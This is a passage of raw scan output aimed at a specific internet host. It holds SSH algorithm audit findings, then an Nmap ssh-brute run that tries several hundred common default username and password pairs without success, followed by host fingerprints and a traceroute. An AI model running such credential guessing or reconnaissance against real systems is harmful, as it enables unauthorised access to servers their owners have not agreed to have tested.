1698(enc) 3des-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1699 `- [warn] using weak cipher
1700 `- [warn] using weak cipher mode
1701 `- [warn] using small 64-bit block size
1702 `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
1703(enc) blowfish-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1704 `- [fail] disabled since Dropbear SSH 0.53
1705 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
1706 `- [warn] using weak cipher mode
1707 `- [warn] using small 64-bit block size
1708 `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
1709(enc) cast128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1710 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
1711 `- [warn] using weak cipher mode
1712 `- [warn] using small 64-bit block size
1713 `- [info] available since OpenSSH 2.1.0
1714(enc) aes192-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1715 `- [warn] using weak cipher mode
1716 `- [info] available since OpenSSH 2.3.0
1717(enc) aes256-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1718 `- [warn] using weak cipher mode
1719 `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.47
1720(enc) arcfour -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1721 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
1722 `- [warn] using weak cipher
1723 `- [info] available since OpenSSH 2.1.0
1724(enc) rijndael-cbc@lysator.liu.se -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1725 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
1726 `- [warn] using weak cipher mode
1727 `- [info] available since OpenSSH 2.3.0
1728
1729# message authentication code algorithms
1730(mac) hmac-md5 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1731 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
1732 `- [warn] using encrypt-and-MAC mode
1733 `- [warn] using weak hashing algorithm
1734 `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
1735(mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
1736 `- [warn] using weak hashing algorithm
1737 `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
1738(mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
1739 `- [warn] using small 64-bit tag size
1740 `- [info] available since OpenSSH 4.7
1741(mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
1742 `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
1743(mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
1744 `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
1745(mac) hmac-ripemd160 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1746 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
1747 `- [warn] using encrypt-and-MAC mode
1748 `- [info] available since OpenSSH 2.5.0
1749(mac) hmac-ripemd160@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1750 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
1751 `- [warn] using encrypt-and-MAC mode
1752 `- [info] available since OpenSSH 2.1.0
1753(mac) hmac-sha1-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1754 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
1755 `- [warn] using encrypt-and-MAC mode
1756 `- [warn] using weak hashing algorithm
1757 `- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.47
1758(mac) hmac-md5-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1759 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
1760 `- [warn] using encrypt-and-MAC mode
1761 `- [warn] using weak hashing algorithm
1762 `- [info] available since OpenSSH 2.5.0
1763
1764# algorithm recommendations (for OpenSSH 5.3)
1765(rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
1766(rec) -diffie-hellman-group1-sha1 -- kex algorithm to remove
1767(rec) -diffie-hellman-group-exchange-sha1 -- kex algorithm to remove
1768(rec) -ssh-dss -- key algorithm to remove
1769(rec) -arcfour -- enc algorithm to remove
1770(rec) -rijndael-cbc@lysator.liu.se -- enc algorithm to remove
1771(rec) -blowfish-cbc -- enc algorithm to remove
1772(rec) -3des-cbc -- enc algorithm to remove
1773(rec) -aes256-cbc -- enc algorithm to remove
1774(rec) -arcfour256 -- enc algorithm to remove
1775(rec) -cast128-cbc -- enc algorithm to remove
1776(rec) -aes192-cbc -- enc algorithm to remove
1777(rec) -arcfour128 -- enc algorithm to remove
1778(rec) -aes128-cbc -- enc algorithm to remove
1779(rec) -hmac-md5-96 -- mac algorithm to remove
1780(rec) -hmac-ripemd160 -- mac algorithm to remove
1781(rec) -hmac-sha1-96 -- mac algorithm to remove
1782(rec) -umac-64@openssh.com -- mac algorithm to remove
1783(rec) -hmac-md5 -- mac algorithm to remove
1784(rec) -hmac-ripemd160@openssh.com -- mac algorithm to remove
1785(rec) -hmac-sha1 -- mac algorithm to remove
1786####################################################################################################################################
1787Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-05 03:24 EST
1788NSE: [ssh-run] Failed to specify credentials and command to run.
1789NSE: [ssh-brute] Trying username/password pair: root:root
1790NSE: [ssh-brute] Trying username/password pair: admin:admin
1791NSE: [ssh-brute] Trying username/password pair: administrator:administrator
1792NSE: [ssh-brute] Trying username/password pair: webadmin:webadmin
1793NSE: [ssh-brute] Trying username/password pair: sysadmin:sysadmin
1794NSE: [ssh-brute] Trying username/password pair: netadmin:netadmin
1795NSE: [ssh-brute] Trying username/password pair: guest:guest
1796NSE: [ssh-brute] Trying username/password pair: user:user
1797NSE: [ssh-brute] Trying username/password pair: web:web
1798NSE: [ssh-brute] Trying username/password pair: test:test
1799NSE: [ssh-brute] Trying username/password pair: root:
1800NSE: [ssh-brute] Trying username/password pair: admin:
1801NSE: [ssh-brute] Trying username/password pair: administrator:
1802NSE: [ssh-brute] Trying username/password pair: webadmin:
1803NSE: [ssh-brute] Trying username/password pair: sysadmin:
1804NSE: [ssh-brute] Trying username/password pair: netadmin:
1805NSE: [ssh-brute] Trying username/password pair: guest:
1806NSE: [ssh-brute] Trying username/password pair: user:
1807NSE: [ssh-brute] Trying username/password pair: web:
1808NSE: [ssh-brute] Trying username/password pair: test:
1809NSE: [ssh-brute] Trying username/password pair: root:123456
1810NSE: [ssh-brute] Trying username/password pair: admin:123456
1811NSE: [ssh-brute] Trying username/password pair: administrator:123456
1812NSE: [ssh-brute] Trying username/password pair: webadmin:123456
1813NSE: [ssh-brute] Trying username/password pair: sysadmin:123456
1814NSE: [ssh-brute] Trying username/password pair: netadmin:123456
1815NSE: [ssh-brute] Trying username/password pair: guest:123456
1816NSE: [ssh-brute] Trying username/password pair: user:123456
1817NSE: [ssh-brute] Trying username/password pair: web:123456
1818NSE: [ssh-brute] Trying username/password pair: test:123456
1819NSE: [ssh-brute] Trying username/password pair: root:12345
1820NSE: [ssh-brute] Trying username/password pair: admin:12345
1821NSE: [ssh-brute] Trying username/password pair: administrator:12345
1822NSE: [ssh-brute] Trying username/password pair: webadmin:12345
1823NSE: [ssh-brute] Trying username/password pair: sysadmin:12345
1824NSE: [ssh-brute] Trying username/password pair: netadmin:12345
1825NSE: [ssh-brute] Trying username/password pair: guest:12345
1826NSE: [ssh-brute] Trying username/password pair: user:12345
1827NSE: [ssh-brute] Trying username/password pair: web:12345
1828NSE: [ssh-brute] Trying username/password pair: test:12345
1829NSE: [ssh-brute] Trying username/password pair: root:123456789
1830NSE: [ssh-brute] Trying username/password pair: admin:123456789
1831NSE: [ssh-brute] Trying username/password pair: administrator:123456789
1832NSE: [ssh-brute] Trying username/password pair: webadmin:123456789
1833NSE: [ssh-brute] Trying username/password pair: sysadmin:123456789
1834NSE: [ssh-brute] Trying username/password pair: netadmin:123456789
1835NSE: [ssh-brute] Trying username/password pair: guest:123456789
1836NSE: [ssh-brute] Trying username/password pair: user:123456789
1837NSE: [ssh-brute] Trying username/password pair: web:123456789
1838NSE: [ssh-brute] Trying username/password pair: test:123456789
1839NSE: [ssh-brute] Trying username/password pair: root:password
1840NSE: [ssh-brute] Trying username/password pair: admin:password
1841NSE: [ssh-brute] Trying username/password pair: administrator:password
1842NSE: [ssh-brute] Trying username/password pair: webadmin:password
1843NSE: [ssh-brute] Trying username/password pair: sysadmin:password
1844NSE: [ssh-brute] Trying username/password pair: netadmin:password
1845NSE: [ssh-brute] Trying username/password pair: guest:password
1846NSE: [ssh-brute] Trying username/password pair: user:password
1847NSE: [ssh-brute] Trying username/password pair: web:password
1848NSE: [ssh-brute] Trying username/password pair: test:password
1849NSE: [ssh-brute] Trying username/password pair: root:iloveyou
1850NSE: [ssh-brute] Trying username/password pair: admin:iloveyou
1851NSE: [ssh-brute] Trying username/password pair: administrator:iloveyou
1852NSE: [ssh-brute] Trying username/password pair: webadmin:iloveyou
1853NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveyou
1854NSE: [ssh-brute] Trying username/password pair: netadmin:iloveyou
1855NSE: [ssh-brute] Trying username/password pair: guest:iloveyou
1856NSE: [ssh-brute] Trying username/password pair: user:iloveyou
1857NSE: [ssh-brute] Trying username/password pair: web:iloveyou
1858NSE: [ssh-brute] Trying username/password pair: test:iloveyou
1859NSE: [ssh-brute] Trying username/password pair: root:princess
1860NSE: [ssh-brute] Trying username/password pair: admin:princess
1861NSE: [ssh-brute] Trying username/password pair: administrator:princess
1862NSE: [ssh-brute] Trying username/password pair: webadmin:princess
1863NSE: [ssh-brute] Trying username/password pair: sysadmin:princess
1864NSE: [ssh-brute] Trying username/password pair: netadmin:princess
1865NSE: [ssh-brute] Trying username/password pair: guest:princess
1866NSE: [ssh-brute] Trying username/password pair: user:princess
1867NSE: [ssh-brute] Trying username/password pair: web:princess
1868NSE: [ssh-brute] Trying username/password pair: test:princess
1869NSE: [ssh-brute] Trying username/password pair: root:12345678
1870NSE: [ssh-brute] Trying username/password pair: admin:12345678
1871NSE: [ssh-brute] Trying username/password pair: administrator:12345678
1872NSE: [ssh-brute] Trying username/password pair: webadmin:12345678
1873NSE: [ssh-brute] Trying username/password pair: sysadmin:12345678
1874NSE: [ssh-brute] Trying username/password pair: netadmin:12345678
1875NSE: [ssh-brute] Trying username/password pair: guest:12345678
1876NSE: [ssh-brute] Trying username/password pair: user:12345678
1877NSE: [ssh-brute] Trying username/password pair: web:12345678
1878NSE: [ssh-brute] Trying username/password pair: test:12345678
1879NSE: [ssh-brute] Trying username/password pair: root:1234567
1880NSE: [ssh-brute] Trying username/password pair: admin:1234567
1881NSE: [ssh-brute] Trying username/password pair: administrator:1234567
1882NSE: [ssh-brute] Trying username/password pair: webadmin:1234567
1883NSE: [ssh-brute] Trying username/password pair: sysadmin:1234567
1884NSE: [ssh-brute] Trying username/password pair: netadmin:1234567
1885NSE: [ssh-brute] Trying username/password pair: guest:1234567
1886NSE: [ssh-brute] Trying username/password pair: user:1234567
1887NSE: [ssh-brute] Trying username/password pair: web:1234567
1888NSE: [ssh-brute] Trying username/password pair: test:1234567
1889NSE: [ssh-brute] Trying username/password pair: root:abc123
1890NSE: [ssh-brute] Trying username/password pair: admin:abc123
1891NSE: [ssh-brute] Trying username/password pair: administrator:abc123
1892NSE: [ssh-brute] Trying username/password pair: webadmin:abc123
1893NSE: [ssh-brute] Trying username/password pair: sysadmin:abc123
1894NSE: [ssh-brute] Trying username/password pair: netadmin:abc123
1895NSE: [ssh-brute] Trying username/password pair: guest:abc123
1896NSE: [ssh-brute] Trying username/password pair: user:abc123
1897NSE: [ssh-brute] Trying username/password pair: web:abc123
1898NSE: [ssh-brute] Trying username/password pair: test:abc123
1899NSE: [ssh-brute] Trying username/password pair: root:nicole
1900NSE: [ssh-brute] Trying username/password pair: admin:nicole
1901NSE: [ssh-brute] Trying username/password pair: administrator:nicole
1902NSE: [ssh-brute] Trying username/password pair: webadmin:nicole
1903NSE: [ssh-brute] Trying username/password pair: sysadmin:nicole
1904NSE: [ssh-brute] Trying username/password pair: netadmin:nicole
1905NSE: [ssh-brute] Trying username/password pair: guest:nicole
1906NSE: [ssh-brute] Trying username/password pair: user:nicole
1907NSE: [ssh-brute] Trying username/password pair: web:nicole
1908NSE: [ssh-brute] Trying username/password pair: test:nicole
1909NSE: [ssh-brute] Trying username/password pair: root:daniel
1910NSE: [ssh-brute] Trying username/password pair: admin:daniel
1911NSE: [ssh-brute] Trying username/password pair: administrator:daniel
1912NSE: [ssh-brute] Trying username/password pair: webadmin:daniel
1913NSE: [ssh-brute] Trying username/password pair: sysadmin:daniel
1914NSE: [ssh-brute] Trying username/password pair: netadmin:daniel
1915NSE: [ssh-brute] Trying username/password pair: guest:daniel
1916NSE: [ssh-brute] Trying username/password pair: user:daniel
1917NSE: [ssh-brute] Trying username/password pair: web:daniel
1918NSE: [ssh-brute] Trying username/password pair: test:daniel
1919NSE: [ssh-brute] Trying username/password pair: root:monkey
1920NSE: [ssh-brute] Trying username/password pair: admin:monkey
1921NSE: [ssh-brute] Trying username/password pair: administrator:monkey
1922NSE: [ssh-brute] Trying username/password pair: webadmin:monkey
1923NSE: [ssh-brute] Trying username/password pair: sysadmin:monkey
1924NSE: [ssh-brute] Trying username/password pair: netadmin:monkey
1925NSE: [ssh-brute] Trying username/password pair: guest:monkey
1926NSE: [ssh-brute] Trying username/password pair: user:monkey
1927NSE: [ssh-brute] Trying username/password pair: web:monkey
1928NSE: [ssh-brute] Trying username/password pair: test:monkey
1929NSE: [ssh-brute] Trying username/password pair: root:babygirl
1930NSE: [ssh-brute] Trying username/password pair: admin:babygirl
1931NSE: [ssh-brute] Trying username/password pair: administrator:babygirl
1932NSE: [ssh-brute] Trying username/password pair: webadmin:babygirl
1933NSE: [ssh-brute] Trying username/password pair: sysadmin:babygirl
1934NSE: [ssh-brute] Trying username/password pair: netadmin:babygirl
1935NSE: [ssh-brute] Trying username/password pair: guest:babygirl
1936NSE: [ssh-brute] Trying username/password pair: user:babygirl
1937NSE: [ssh-brute] Trying username/password pair: web:babygirl
1938NSE: [ssh-brute] Trying username/password pair: test:babygirl
1939NSE: [ssh-brute] Trying username/password pair: root:qwerty
1940NSE: [ssh-brute] Trying username/password pair: admin:qwerty
1941NSE: [ssh-brute] Trying username/password pair: administrator:qwerty
1942NSE: [ssh-brute] Trying username/password pair: webadmin:qwerty
1943NSE: [ssh-brute] Trying username/password pair: sysadmin:qwerty
1944NSE: [ssh-brute] Trying username/password pair: netadmin:qwerty
1945NSE: [ssh-brute] Trying username/password pair: guest:qwerty
1946NSE: [ssh-brute] Trying username/password pair: user:qwerty
1947NSE: [ssh-brute] Trying username/password pair: web:qwerty
1948NSE: [ssh-brute] Trying username/password pair: test:qwerty
1949NSE: [ssh-brute] Trying username/password pair: root:lovely
1950NSE: [ssh-brute] Trying username/password pair: admin:lovely
1951NSE: [ssh-brute] Trying username/password pair: administrator:lovely
1952NSE: [ssh-brute] Trying username/password pair: webadmin:lovely
1953NSE: [ssh-brute] Trying username/password pair: sysadmin:lovely
1954NSE: [ssh-brute] Trying username/password pair: netadmin:lovely
1955NSE: [ssh-brute] Trying username/password pair: guest:lovely
1956NSE: [ssh-brute] Trying username/password pair: user:lovely
1957NSE: [ssh-brute] Trying username/password pair: web:lovely
1958NSE: [ssh-brute] Trying username/password pair: test:lovely
1959NSE: [ssh-brute] Trying username/password pair: root:654321
1960NSE: [ssh-brute] Trying username/password pair: admin:654321
1961NSE: [ssh-brute] Trying username/password pair: administrator:654321
1962NSE: [ssh-brute] Trying username/password pair: webadmin:654321
1963NSE: [ssh-brute] Trying username/password pair: sysadmin:654321
1964NSE: [ssh-brute] Trying username/password pair: netadmin:654321
1965NSE: [ssh-brute] Trying username/password pair: guest:654321
1966NSE: [ssh-brute] Trying username/password pair: user:654321
1967NSE: [ssh-brute] Trying username/password pair: web:654321
1968NSE: [ssh-brute] Trying username/password pair: test:654321
1969NSE: [ssh-brute] Trying username/password pair: root:michael
1970NSE: [ssh-brute] Trying username/password pair: admin:michael
1971NSE: [ssh-brute] Trying username/password pair: administrator:michael
1972NSE: [ssh-brute] Trying username/password pair: webadmin:michael
1973NSE: [ssh-brute] Trying username/password pair: sysadmin:michael
1974NSE: [ssh-brute] Trying username/password pair: netadmin:michael
1975NSE: [ssh-brute] Trying username/password pair: guest:michael
1976NSE: [ssh-brute] Trying username/password pair: user:michael
1977NSE: [ssh-brute] Trying username/password pair: web:michael
1978NSE: [ssh-brute] Trying username/password pair: test:michael
1979NSE: [ssh-brute] Trying username/password pair: root:jessica
1980NSE: [ssh-brute] Trying username/password pair: admin:jessica
1981NSE: [ssh-brute] Trying username/password pair: administrator:jessica
1982NSE: [ssh-brute] Trying username/password pair: webadmin:jessica
1983NSE: [ssh-brute] Trying username/password pair: sysadmin:jessica
1984NSE: [ssh-brute] Trying username/password pair: netadmin:jessica
1985NSE: [ssh-brute] Trying username/password pair: guest:jessica
1986NSE: [ssh-brute] Trying username/password pair: user:jessica
1987NSE: [ssh-brute] Trying username/password pair: web:jessica
1988NSE: [ssh-brute] Trying username/password pair: test:jessica
1989NSE: [ssh-brute] Trying username/password pair: root:111111
1990NSE: [ssh-brute] Trying username/password pair: admin:111111
1991NSE: [ssh-brute] Trying username/password pair: administrator:111111
1992NSE: [ssh-brute] Trying username/password pair: webadmin:111111
1993NSE: [ssh-brute] Trying username/password pair: sysadmin:111111
1994NSE: [ssh-brute] Trying username/password pair: netadmin:111111
1995NSE: [ssh-brute] Trying username/password pair: guest:111111
1996NSE: [ssh-brute] Trying username/password pair: user:111111
1997NSE: [ssh-brute] Trying username/password pair: web:111111
1998NSE: [ssh-brute] Trying username/password pair: test:111111
1999NSE: [ssh-brute] Trying username/password pair: root:ashley
2000NSE: [ssh-brute] Trying username/password pair: admin:ashley
2001NSE: [ssh-brute] Trying username/password pair: administrator:ashley
2002NSE: [ssh-brute] Trying username/password pair: webadmin:ashley
2003NSE: [ssh-brute] Trying username/password pair: sysadmin:ashley
2004NSE: [ssh-brute] Trying username/password pair: netadmin:ashley
2005NSE: [ssh-brute] Trying username/password pair: guest:ashley
2006NSE: [ssh-brute] Trying username/password pair: user:ashley
2007NSE: [ssh-brute] Trying username/password pair: web:ashley
2008NSE: [ssh-brute] Trying username/password pair: test:ashley
2009NSE: [ssh-brute] Trying username/password pair: root:000000
2010NSE: [ssh-brute] Trying username/password pair: admin:000000
2011NSE: [ssh-brute] Trying username/password pair: administrator:000000
2012NSE: [ssh-brute] Trying username/password pair: webadmin:000000
2013NSE: [ssh-brute] Trying username/password pair: sysadmin:000000
2014NSE: [ssh-brute] Trying username/password pair: netadmin:000000
2015NSE: [ssh-brute] Trying username/password pair: guest:000000
2016NSE: [ssh-brute] Trying username/password pair: user:000000
2017NSE: [ssh-brute] Trying username/password pair: web:000000
2018NSE: [ssh-brute] Trying username/password pair: test:000000
2019NSE: [ssh-brute] Trying username/password pair: root:iloveu
2020NSE: [ssh-brute] Trying username/password pair: admin:iloveu
2021NSE: [ssh-brute] Trying username/password pair: administrator:iloveu
2022NSE: [ssh-brute] Trying username/password pair: webadmin:iloveu
2023NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveu
2024NSE: [ssh-brute] Trying username/password pair: netadmin:iloveu
2025NSE: [ssh-brute] Trying username/password pair: guest:iloveu
2026NSE: [ssh-brute] Trying username/password pair: user:iloveu
2027NSE: [ssh-brute] Trying username/password pair: web:iloveu
2028NSE: [ssh-brute] Trying username/password pair: test:iloveu
2029NSE: [ssh-brute] Trying username/password pair: root:michelle
2030NSE: [ssh-brute] Trying username/password pair: admin:michelle
2031NSE: [ssh-brute] Trying username/password pair: administrator:michelle
2032NSE: [ssh-brute] Trying username/password pair: webadmin:michelle
2033NSE: [ssh-brute] Trying username/password pair: sysadmin:michelle
2034NSE: [ssh-brute] Trying username/password pair: netadmin:michelle
2035NSE: [ssh-brute] Trying username/password pair: guest:michelle
2036NSE: [ssh-brute] Trying username/password pair: user:michelle
2037NSE: [ssh-brute] Trying username/password pair: web:michelle
2038NSE: [ssh-brute] Trying username/password pair: test:michelle
2039NSE: [ssh-brute] Trying username/password pair: root:tigger
2040NSE: [ssh-brute] Trying username/password pair: admin:tigger
2041NSE: [ssh-brute] Trying username/password pair: administrator:tigger
2042NSE: [ssh-brute] Trying username/password pair: webadmin:tigger
2043NSE: [ssh-brute] Trying username/password pair: sysadmin:tigger
2044NSE: [ssh-brute] Trying username/password pair: netadmin:tigger
2045NSE: [ssh-brute] Trying username/password pair: guest:tigger
2046NSE: [ssh-brute] Trying username/password pair: user:tigger
2047NSE: [ssh-brute] Trying username/password pair: web:tigger
2048NSE: [ssh-brute] Trying username/password pair: test:tigger
2049NSE: [ssh-brute] Trying username/password pair: root:sunshine
2050NSE: [ssh-brute] Trying username/password pair: admin:sunshine
2051NSE: [ssh-brute] Trying username/password pair: administrator:sunshine
2052NSE: [ssh-brute] Trying username/password pair: webadmin:sunshine
2053NSE: [ssh-brute] Trying username/password pair: sysadmin:sunshine
2054NSE: [ssh-brute] Trying username/password pair: netadmin:sunshine
2055NSE: [ssh-brute] Trying username/password pair: guest:sunshine
2056NSE: [ssh-brute] Trying username/password pair: user:sunshine
2057NSE: [ssh-brute] Trying username/password pair: web:sunshine
2058NSE: [ssh-brute] Trying username/password pair: test:sunshine
2059NSE: [ssh-brute] Trying username/password pair: root:chocolate
2060NSE: [ssh-brute] Trying username/password pair: admin:chocolate
2061NSE: [ssh-brute] Trying username/password pair: administrator:chocolate
2062NSE: [ssh-brute] Trying username/password pair: webadmin:chocolate
2063NSE: [ssh-brute] Trying username/password pair: sysadmin:chocolate
2064NSE: [ssh-brute] Trying username/password pair: netadmin:chocolate
2065NSE: [ssh-brute] Trying username/password pair: guest:chocolate
2066NSE: [ssh-brute] Trying username/password pair: user:chocolate
2067NSE: [ssh-brute] Trying username/password pair: web:chocolate
2068NSE: [ssh-brute] Trying username/password pair: test:chocolate
2069NSE: [ssh-brute] Trying username/password pair: root:password1
2070NSE: [ssh-brute] Trying username/password pair: admin:password1
2071NSE: [ssh-brute] Trying username/password pair: administrator:password1
2072NSE: [ssh-brute] Trying username/password pair: webadmin:password1
2073NSE: [ssh-brute] Trying username/password pair: sysadmin:password1
2074NSE: [ssh-brute] Trying username/password pair: netadmin:password1
2075NSE: [ssh-brute] Trying username/password pair: guest:password1
2076NSE: [ssh-brute] Trying username/password pair: user:password1
2077NSE: [ssh-brute] Trying username/password pair: web:password1
2078NSE: [ssh-brute] Trying username/password pair: test:password1
2079NSE: [ssh-brute] Trying username/password pair: root:soccer
2080NSE: [ssh-brute] Trying username/password pair: admin:soccer
2081NSE: [ssh-brute] Trying username/password pair: administrator:soccer
2082NSE: [ssh-brute] Trying username/password pair: webadmin:soccer
2083NSE: [ssh-brute] Trying username/password pair: sysadmin:soccer
2084NSE: [ssh-brute] Trying username/password pair: netadmin:soccer
2085NSE: [ssh-brute] Trying username/password pair: guest:soccer
2086NSE: [ssh-brute] Trying username/password pair: user:soccer
2087NSE: [ssh-brute] Trying username/password pair: web:soccer
2088NSE: [ssh-brute] Trying username/password pair: test:soccer
2089NSE: [ssh-brute] Trying username/password pair: root:anthony
2090NSE: [ssh-brute] Trying username/password pair: admin:anthony
2091NSE: [ssh-brute] Trying username/password pair: administrator:anthony
2092NSE: [ssh-brute] Trying username/password pair: webadmin:anthony
2093NSE: [ssh-brute] Trying username/password pair: sysadmin:anthony
2094NSE: [ssh-brute] Trying username/password pair: netadmin:anthony
2095NSE: [ssh-brute] Trying username/password pair: guest:anthony
2096NSE: [ssh-brute] Trying username/password pair: user:anthony
2097NSE: [ssh-brute] Trying username/password pair: web:anthony
2098NSE: [ssh-brute] Trying username/password pair: test:anthony
2099NSE: [ssh-brute] Trying username/password pair: root:friends
2100NSE: [ssh-brute] Trying username/password pair: admin:friends
2101NSE: [ssh-brute] Trying username/password pair: administrator:friends
2102NSE: [ssh-brute] Trying username/password pair: webadmin:friends
2103NSE: [ssh-brute] Trying username/password pair: sysadmin:friends
2104NSE: [ssh-brute] Trying username/password pair: netadmin:friends
2105NSE: [ssh-brute] Trying username/password pair: guest:friends
2106NSE: [ssh-brute] Trying username/password pair: user:friends
2107NSE: [ssh-brute] Trying username/password pair: web:friends
2108NSE: [ssh-brute] Trying username/password pair: test:friends
2109NSE: [ssh-brute] Trying username/password pair: root:purple
2110NSE: [ssh-brute] Trying username/password pair: admin:purple
2111NSE: [ssh-brute] Trying username/password pair: administrator:purple
2112NSE: [ssh-brute] Trying username/password pair: webadmin:purple
2113NSE: [ssh-brute] Trying username/password pair: sysadmin:purple
2114NSE: [ssh-brute] Trying username/password pair: netadmin:purple
2115NSE: [ssh-brute] Trying username/password pair: guest:purple
2116NSE: [ssh-brute] Trying username/password pair: user:purple
2117NSE: [ssh-brute] Trying username/password pair: web:purple
2118NSE: [ssh-brute] Trying username/password pair: test:purple
2119NSE: [ssh-brute] Trying username/password pair: root:angel
2120NSE: [ssh-brute] Trying username/password pair: admin:angel
2121NSE: [ssh-brute] Trying username/password pair: administrator:angel
2122NSE: [ssh-brute] Trying username/password pair: webadmin:angel
2123NSE: [ssh-brute] Trying username/password pair: sysadmin:angel
2124NSE: [ssh-brute] Trying username/password pair: netadmin:angel
2125NSE: [ssh-brute] Trying username/password pair: guest:angel
2126NSE: [ssh-brute] Trying username/password pair: user:angel
2127NSE: [ssh-brute] Trying username/password pair: web:angel
2128NSE: [ssh-brute] Trying username/password pair: test:angel
2129NSE: [ssh-brute] Trying username/password pair: root:butterfly
2130NSE: [ssh-brute] Trying username/password pair: admin:butterfly
2131NSE: [ssh-brute] Trying username/password pair: administrator:butterfly
2132NSE: [ssh-brute] Trying username/password pair: webadmin:butterfly
2133NSE: [ssh-brute] Trying username/password pair: sysadmin:butterfly
2134NSE: [ssh-brute] Trying username/password pair: netadmin:butterfly
2135NSE: [ssh-brute] Trying username/password pair: guest:butterfly
2136NSE: [ssh-brute] Trying username/password pair: user:butterfly
2137NSE: [ssh-brute] Trying username/password pair: web:butterfly
2138NSE: [ssh-brute] Trying username/password pair: test:butterfly
2139NSE: [ssh-brute] Trying username/password pair: root:jordan
2140NSE: [ssh-brute] Trying username/password pair: admin:jordan
2141NSE: [ssh-brute] Trying username/password pair: administrator:jordan
2142NSE: [ssh-brute] Trying username/password pair: webadmin:jordan
2143NSE: [ssh-brute] Trying username/password pair: sysadmin:jordan
2144NSE: [ssh-brute] Trying username/password pair: netadmin:jordan
2145NSE: [ssh-brute] Trying username/password pair: guest:jordan
2146NSE: [ssh-brute] Trying username/password pair: user:jordan
2147NSE: [ssh-brute] Trying username/password pair: web:jordan
2148NSE: [ssh-brute] Trying username/password pair: test:jordan
2149NSE: [ssh-brute] Trying username/password pair: root:fuckyou
2150NSE: [ssh-brute] Trying username/password pair: admin:fuckyou
2151NSE: [ssh-brute] Trying username/password pair: administrator:fuckyou
2152NSE: [ssh-brute] Trying username/password pair: webadmin:fuckyou
2153NSE: [ssh-brute] Trying username/password pair: sysadmin:fuckyou
2154NSE: [ssh-brute] Trying username/password pair: netadmin:fuckyou
2155NSE: [ssh-brute] Trying username/password pair: guest:fuckyou
2156NSE: [ssh-brute] Trying username/password pair: user:fuckyou
2157NSE: [ssh-brute] Trying username/password pair: web:fuckyou
2158NSE: [ssh-brute] Trying username/password pair: test:fuckyou
2159NSE: [ssh-brute] Trying username/password pair: root:123123
2160NSE: [ssh-brute] Trying username/password pair: admin:123123
2161NSE: [ssh-brute] Trying username/password pair: administrator:123123
2162NSE: [ssh-brute] Trying username/password pair: webadmin:123123
2163NSE: [ssh-brute] Trying username/password pair: sysadmin:123123
2164NSE: [ssh-brute] Trying username/password pair: netadmin:123123
2165NSE: [ssh-brute] Trying username/password pair: guest:123123
2166NSE: [ssh-brute] Trying username/password pair: user:123123
2167NSE: [ssh-brute] usernames: Time limit 3m00s exceeded.
2168NSE: [ssh-brute] usernames: Time limit 3m00s exceeded.
2169NSE: [ssh-brute] passwords: Time limit 3m00s exceeded.
2170Nmap scan report for s18161039.onlinehome-server.info (217.160.131.142)
2171Host is up (0.16s latency).
2172
2173PORT STATE SERVICE VERSION
217422/tcp open ssh OpenSSH 5.3 (protocol 2.0)
2175| ssh-auth-methods:
2176| Supported authentication methods:
2177| publickey
2178| gssapi-keyex
2179| gssapi-with-mic
2180|_ password
2181| ssh-brute:
2182| Accounts: No valid accounts found
2183|_ Statistics: Performed 378 guesses in 180 seconds, average tps: 2.5
2184| ssh-hostkey:
2185| 1024 a8:a9:da:bc:cb:8d:0b:ee:5c:06:94:59:e9:e1:9e:6e (DSA)
2186|_ 2048 95:1e:62:e2:8f:bb:20:92:a7:f4:ab:a7:44:f6:37:f0 (RSA)
2187| ssh-publickey-acceptance:
2188|_ Accepted Public Keys: No public keys accepted
2189|_ssh-run: Failed to specify credentials and command to run.
2190Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
2191Aggressive OS guesses: Linux 2.6.32 (95%), Linux 3.10 (94%), MikroTik RouterOS 6.32.1 (92%), Linux 3.5 (92%), Linux 3.8 (92%), Linux 2.6.32 - 3.10 (91%), Linux 2.6.32 - 3.13 (91%), Linux 2.6.32 - 3.9 (91%), Linux 3.2 (91%), Linux 2.6.32 - 3.1 (91%)
2192No exact OS matches for host (test conditions non-ideal).
2193Network Distance: 16 hops
2194
2195TRACEROUTE (using port 22/tcp)
2196HOP RTT ADDRESS
21971 53.78 ms 10.246.204.1
21982 127.73 ms 104.245.145.177
21993 127.81 ms te0-1-1-9.219.ccr32.yyz02.atlas.cogentco.com (38.104.158.113)
